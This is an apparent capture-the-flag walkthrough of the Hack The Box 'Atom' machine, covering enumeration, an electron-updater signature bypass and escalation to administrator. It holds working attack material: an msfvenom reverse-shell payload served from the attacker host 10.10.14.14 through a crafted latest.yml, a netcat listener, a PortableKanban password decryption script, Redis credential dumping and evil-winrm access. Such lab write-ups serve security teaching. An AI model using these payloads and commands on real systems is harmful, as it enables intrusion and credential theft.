HTB WriteUps

Atom

Last updated 2 years ago
Enumeration

As always, we start with the enumeration phase: scan the machine for open ports and then identify the services and versions behind them.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.237 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Mon Apr 17 08:38:39 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.053s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  wsman
6379/tcp open  redis
7680/tcp open  pando-pub

# Nmap done at Mon Apr 17 08:39:05 2023 -- 1 IP address (1 host up) scanned in 26.46 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,443,445,5985,6379,7680 10.10.10.237 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Apr 17 08:39:52 2023 as: nmap -sCV -p80,135,443,445,5985,6379,7680 -Pn -n -oN targeted 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.040s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Heed Solutions
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
|_http-title: Heed Solutions
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h20m00s, deviation: 4h02m30s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-17T08:40:41
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-04-17T01:40:39-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 17 08:41:19 2023 -- 1 IP address (1 host up) scanned in 87.28 seconds

Let's start enumerating the website. It shows a simple landing page from where we can download a ZIP file from the Download for Windows button.

Once downloaded, unzip the heed_setup_v1.0.0.zip file.

unzip heed_setup_v1.0.0.zip

Now we get the heedv1 Setup 1.0.0.exe binary, an NSIS installer (the $PLUGINSDIR folder it contains is the giveaway), which 7z can unpack as well.

7z x "heedv1 Setup 1.0.0.exe"

Now we've got the $PLUGINSDIR directory and the Uninstall heedv1.exe binary. Inside the folder there is another compressed archive, app-64.7z, holding the packed Electron application. Quote the directory name so the shell does not try to expand it as a variable.

cd '$PLUGINSDIR'

7z x app-64.7z

Once decompressed, we should see the resources directory, which has a file called app.asar.

ls -l resources

total 3340
-rw-r--r--  1 root root 2994272 Apr  9  2021 app.asar
-rw-r--r--  1 root root      79 Apr  9  2021 app-update.yml
-rw-r--r--  1 root root  296356 Apr  9  2021 electron.asar
-rw-r--r--  1 root root  114416 Apr  9  2021 elevate.exe
drwx------ 69 root root    4096 Apr  9  2021 inspector

asar (installable from npm) lists and extracts the contents of Electron's .asar archives, which are simple concatenations of the application's JavaScript sources and assets.

asar list app.asar

...
/main.js
...

There is one file called main.js which could have valuable information. Extract that file to the current directory and check it out.

asar extract-file app.asar main.js

cat main.js

const {app, BrowserWindow, Menu, protocol, ipcMain} = require('electron');
const log = require('electron-log');
const {autoUpdater} = require("electron-updater");
const path = require('path');
...

As we can see, it requires electron-updater, and the app-update.yml we saw next to app.asar is that updater's provider configuration. This will be useful later. Let's keep enumerating the server by listing SMB shares with the guest account.

smbmap -H 10.10.10.237 -u 'guest'

[+] IP: 10.10.10.237:445        Name: atom.htb                                          
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        ADMIN$                                          NO ACCESS       Remote Admin
        C$                                              NO ACCESS       Default share
        IPC$                                            READ ONLY       Remote IPC
        Software_Updates                                READ, WRITE

Guest access is allowed and the Software_Updates share is both readable and writable. Let's mount it on our system and check its content.

mkdir /mnt/Software_Updates

mount -t cifs //10.10.10.237/Software_Updates /mnt/Software_Updates

tree -fas /mnt/Software_Updates/

[       4096]  /mnt/Software_Updates
├── [          0]  /mnt/Software_Updates/client1
├── [          0]  /mnt/Software_Updates/client2
├── [          0]  /mnt/Software_Updates/client3
└── [      35202]  /mnt/Software_Updates/UAT_Testing_Procedures.pdf

4 directories, 1 file

The PDF describes the UAT procedure: the QA team will check the client folders for new updates. A writable update directory plus an application that ships electron-updater is a promising combination.

Exploitation

As we saw earlier, main.js requires electron-updater. Searching for known issues in that library turns up a Doyensec article called "Signature Validation Bypass Leading to RCE In Electron-Updater", which explains how to get remote command execution through the update channel. On Windows, electron-updater checks the Authenticode signature of a downloaded update by running a PowerShell command with the file path (taken from the path field of latest.yml) embedded in a single-quoted string. A ' character in the file name breaks that command, and the vulnerable versions treated the resulting error as "unable to verify" rather than "reject", so the unsigned binary gets executed. The only remaining checks are that the version in latest.yml is newer than the installed one and that the SHA-512 in latest.yml matches the download, both of which we control. First, we need to create a malicious .exe file with a ' character in the name:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.14 LPORT=4444 -f exe -o "r'everse.exe"

Then, we need to create a file called latest.yml with a link to an HTTP server pointing to the r'everse.exe file and the SHA512 hash of the file. The version must be higher than the installed 1.0.0. Note that electron-builder writes the sha512 field as the base64-encoded digest, not the hex that sha512sum prints; the hex form was accepted by this machine's update check, but against a real electron-updater client encode the raw digest in base64.

sha512sum r'everse.exe

nano latest.yml

version: 1.2.3
path: http://10.10.14.14/r'everse.exe
sha512: 95e253d75be760812f540136134994d7a397d2dd00bafbe9fbb12ffc7dffa7efcbfe629cdb828eca046f1c1c99c4c75d8c834f5a6a1c5aa7c841d28923967270

Now, set a simple HTTP server where the r'everse.exe binary is located.

python -m http.server 80

And a netcat listener on port 4444, wrapped in rlwrap so the Windows shell gets line editing and history.

rlwrap nc -lvnp 4444

Finally, copy the latest.yml file into the client1 folder of the Software_Updates share. When the simulated QA process picks it up, the Electron app fetches r'everse.exe from our HTTP server, skips the broken signature check and runs it, giving us a reverse shell as jason, from where we can grab the user flag.

cp latest.yml /mnt/Software_Updates/client1

Listening on 0.0.0.0 4444
Connection received on 10.10.10.237 55563
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
atom\jason

C:\WINDOWS\system32>type \users\jason\desktop\user.txt
type \users\jason\desktop\user.txt
87191113288e39df1410cd2aeb9757ba
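
To make the updater-side checks concrete, here is an added example (not part of the original write-up and not electron-updater's code) that builds a latest.yml like the one above and models, in simplified form, the three decisions the vulnerable client makes: version comparison, SHA-512 comparison, and the fail-open Authenticode check described in the Doyensec article. The host 10.10.14.14, the payload bytes and the trusted-file set are constructed stand-ins.

```python
"""Model of the electron-updater manifest and update checks, written for this
write-up. It is not electron-updater's code: signature_check_passes is a
simplified reconstruction of the flaw, and the payload bytes, host and
version numbers are made-up values."""
import base64
import hashlib

# Constructed stand-in for the msfvenom output (the real payload is a PE file).
PAYLOAD = b"MZ" + b"constructed reverse shell stand-in" * 4
ATTACKER_URL = "http://10.10.14.14"   # assumed HTTP server, as in the write-up
INSTALLED_VERSION = "1.0.0"           # from heed_setup_v1.0.0.zip


def sha512_b64(data: bytes) -> str:
    """electron-builder writes the sha512 field base64-encoded, not hex."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode()


def build_latest_yml(version: str, filename: str, data: bytes) -> str:
    """Manifest the updater fetches from its update channel (here the SMB share)."""
    return (f"version: {version}\n"
            f"path: {ATTACKER_URL}/{filename}\n"
            f"sha512: {sha512_b64(data)}\n")


def parse_latest_yml(text: str) -> dict:
    """Tiny 'key: value' parser; enough for the three-line manifest."""
    out = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            out[key.strip()] = value.strip()
    return out


def version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.split("."))


def powershell_verify_command(temp_file: str) -> str:
    """Command the Windows verifier builds: the path is interpolated into a
    single-quoted PowerShell string without any escaping."""
    return f"Get-AuthenticodeSignature '{temp_file}' | ConvertTo-Json -Compress"


def signature_check_passes(temp_file: str, trusted_files: set) -> bool:
    """Fail-open model of the flaw: a quote in the file name terminates the
    PowerShell string literal, the command does not parse, the error is
    swallowed and verification is skipped (True means 'go ahead')."""
    if "'" in temp_file:
        return True
    return temp_file in trusted_files   # stand-in for a real Authenticode match


def would_install(manifest: str, installed: str, downloaded: bytes, trusted: set):
    """Returns (decision, reason) for a fetched manifest and download."""
    m = parse_latest_yml(manifest)
    if version_tuple(m["version"]) <= version_tuple(installed):
        return False, "not newer"
    if m["sha512"] != sha512_b64(downloaded):
        return False, "sha512 mismatch"
    temp_file = m["path"].rsplit("/", 1)[-1]   # updater keeps the name from path
    if not signature_check_passes(temp_file, trusted):
        return False, "signature rejected"
    return True, "installed"


if __name__ == "__main__":
    for name in ("reverse.exe", "r'everse.exe"):
        manifest = build_latest_yml("1.2.3", name, PAYLOAD)
        print(manifest)
        print(powershell_verify_command(name))
        print(would_install(manifest, INSTALLED_VERSION, PAYLOAD, set()))
```

Run it and compare the two file names: reverse.exe is rejected because it carries no acceptable signature, while r'everse.exe is installed because the PowerShell command built around it cannot even be parsed. sha512_b64 produces an 88-character base64 string, which is the form electron-builder writes into latest.yml, as opposed to the 128-character hex digest from sha512sum.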

Privilege Escalation

Inside jason's Downloads folder there is a directory called PortableKanban (next to a node_modules folder).

dir \users\jason\downloads
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\users\jason\downloads

04/02/2021  08:00 AM    <DIR>          .
04/02/2021  08:00 AM    <DIR>          ..
03/31/2021  02:36 AM    <DIR>          node_modules
04/02/2021  08:21 PM    <DIR>          PortableKanban
               0 File(s)              0 bytes
               4 Dir(s)   5,616,992,256 bytes free

Inside the PortableKanban folder, there is one configuration file called PortableKanban.cfg.

dir \users\jason\downloads\PortableKanban

 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\users\jason\downloads\PortableKanban

04/02/2021  08:21 PM    <DIR>          .
04/02/2021  08:21 PM    <DIR>          ..
02/27/2013  08:06 AM            58,368 CommandLine.dll
11/08/2017  01:52 PM           141,312 CsvHelper.dll
06/22/2016  09:31 PM           456,704 DotNetZip.dll
04/02/2021  07:44 AM    <DIR>          Files
11/23/2017  04:29 PM            23,040 Itenso.Rtf.Converter.Html.dll
11/23/2017  04:29 PM            75,776 Itenso.Rtf.Interpreter.dll
11/23/2017  04:29 PM            32,768 Itenso.Rtf.Parser.dll
11/23/2017  04:29 PM            19,968 Itenso.Sys.dll
11/23/2017  04:29 PM           376,832 MsgReader.dll
07/03/2014  10:20 PM           133,296 Ookii.Dialogs.dll
04/02/2021  07:17 AM    <DIR>          Plugins
04/02/2021  08:22 PM             5,920 PortableKanban.cfg
01/04/2018  09:12 PM           118,184 PortableKanban.Data.dll
01/04/2018  09:12 PM         1,878,440 PortableKanban.exe
01/04/2018  09:12 PM            31,144 PortableKanban.Extensions.dll
04/02/2021  07:21 AM               172 PortableKanban.pk3.lock
09/06/2017  12:18 PM           413,184 ServiceStack.Common.dll
09/06/2017  12:17 PM           137,216 ServiceStack.Interfaces.dll
09/06/2017  12:02 PM           292,352 ServiceStack.Redis.dll
09/06/2017  04:38 AM           411,648 ServiceStack.Text.dll
01/04/2018  09:14 PM         1,050,092 User Guide.pdf
              19 File(s)      5,656,416 bytes
               4 Dir(s)   5,614,505,984 bytes free

The PortableKanban.cfg file has one encrypted password for a Redis database.

type \users\jason\downloads\PortableKanban\PortableKanban.cfg

{
    "RoamingSettings":
    {
        "DataSource":"RedisServer",
        "DbServer":"localhost",
        "DbPort":6379,
        "DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb",
        "DbServer2":"","DbPort2":6379
...

searchsploit has a public script for PortableKanban that decrypts these stored passwords: the application encrypts them with DES under a key and IV hard-coded in the binary, so anyone holding the ciphertext can recover them.

searchsploit PortableKanban

------------------------------------------------------------- -----------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- -----------------------
PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval | windows/local/49409.py
------------------------------------------------------------- -----------------------
Shellcodes: No Results

Let's copy it to our working directory and modify it a bit: the original script reads the passwords out of a PortableKanban database file, while the version below simply takes the encrypted string as an argument.

searchsploit -m windows/local/49409.py

nano 49409.py

import base64
import sys

from des import DesKey  # python3 -m pip install des

try:
    password = sys.argv[1]
except IndexError:
    sys.exit("Supply encrypted password")


def decode(enc: str) -> str:
    # PortableKanban stores passwords as base64(DES-CBC(plaintext)) with a
    # key and IV hard-coded in the application; padding=True strips the
    # PKCS#5 padding after decryption.
    ciphertext = base64.b64decode(enc.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(ciphertext, initial=b"XuVUm5fR", padding=True).decode('utf-8')


print("Clear text: {}".format(decode(password)))

Run the script to get the clear text password.

python 49409.py 'Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb'

Clear text: kidvscat_yes_kidvscat

Now that we have credentials for the Redis database (the config points at localhost, but nmap showed port 6379 exposed on the network), let's connect and authenticate. The Keyspace section of info shows a single database, db0.

redis-cli -h 10.10.10.237

10.10.10.237:6379> auth kidvscat_yes_kidvscat
OK
10.10.10.237:6379> info
...
# Keyspace
db0:keys=4,expires=0,avg_ttl=0

db0 has four keys. Select it (the prompt shows database 1 had been selected in between) and list them.

10.10.10.237:6379[1]> select 0
OK
10.10.10.237:6379> keys *
1) "pk:ids:User"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:ids:MetaDataClass"

And the third one has another encrypted password.

10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

Run again the script with the new encrypted password.

python 49409.py 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'

Clear text: kidvscat_admin_@123
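
Before using the recovered password, it is worth seeing what the two ciphertexts give away even without the key. The following added example (mine, not part of the exploit script above) parses the Redis user record as redis-cli printed it and compares the two base64 values block by block: PortableKanban uses DES-CBC with one hard-coded key and IV for every password, so equal leading plaintext blocks produce equal leading ciphertext blocks, and the PKCS#5 padding brackets each password's length. No Redis connection or DES implementation is needed; the ciphertexts are the ones shown above.

```python
"""Added for this write-up; not part of the original exploit script.
Works on the two PortableKanban ciphertexts shown above without the key."""
import base64
import json

# DbEncPassword from PortableKanban.cfg (plaintext: kidvscat_yes_kidvscat)
CFG_CIPHERTEXT = "Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb"
# The pk:urn:user:... value exactly as redis-cli printed it above
# (the leading quote was lost when the output was copied).
REDIS_RECORD_LINE = r'{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"'
DES_BLOCK = 8


def parse_redis_user_record(line: str) -> dict:
    """redis-cli prints bulk strings quoted, with inner quotes escaped as \\" .
    Accepts both the fully quoted form and one whose leading quote is missing."""
    line = line.strip()
    if line.startswith('"'):
        return json.loads(json.loads(line))
    return json.loads(line.rstrip('"').replace('\\"', '"'))


def ciphertext_blocks(b64: str) -> list:
    """Split a base64 ciphertext into 8-byte DES blocks."""
    raw = base64.b64decode(b64)
    if len(raw) % DES_BLOCK:
        raise ValueError("not a whole number of DES blocks: %d bytes" % len(raw))
    return [raw[i:i + DES_BLOCK] for i in range(0, len(raw), DES_BLOCK)]


def shared_leading_blocks(b64_a: str, b64_b: str) -> int:
    """Number of equal leading blocks. Under CBC with a fixed key and IV this
    equals the number of equal leading plaintext blocks."""
    shared = 0
    for x, y in zip(ciphertext_blocks(b64_a), ciphertext_blocks(b64_b)):
        if x != y:
            break
        shared += 1
    return shared


def plaintext_length_range(b64: str) -> tuple:
    """PKCS#5 padding (the exploit's padding=True) always adds 1..8 bytes,
    so n ciphertext blocks mean a plaintext of 8*(n-1) .. 8*n-1 bytes."""
    nblocks = len(ciphertext_blocks(b64))
    return (DES_BLOCK * (nblocks - 1), DES_BLOCK * nblocks - 1)


def leak_report(known_plain: str, known_ct: str, unknown_ct: str) -> dict:
    """What the known password reveals about the unknown one, key not needed:
    the characters it starts with and its length bracket."""
    shared = shared_leading_blocks(known_ct, unknown_ct)
    return {
        "shared_blocks": shared,
        "known_prefix": known_plain[:DES_BLOCK * shared],
        "length_range": plaintext_length_range(unknown_ct),
    }


if __name__ == "__main__":
    record = parse_redis_user_record(REDIS_RECORD_LINE)
    print(record["Name"], record["Role"], record["EncryptedPassword"])
    print(leak_report("kidvscat_yes_kidvscat", CFG_CIPHERTEXT, record["EncryptedPassword"]))
```

Both ciphertexts decode to 24 bytes (three DES blocks) and share exactly their first block, which is why both start with Odh7N3L9aV: the first eight characters of the administrator's password are the same kidvscat prefix as the known one, and its length lies between 16 and 23 bytes. A fresh random IV per record would have hidden both facts.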

crackmapexec confirms the password is reused for the local administrator account; Pwn3d! means it grants administrative access over SMB.

crackmapexec smb 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\administrator:kidvscat_admin_@123 (Pwn3d!)

Finally, get a shell as administrator over WinRM (port 5985 was open) with evil-winrm, and then all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
82ba3dc4bb1a5e965dc5ae876d4f842d
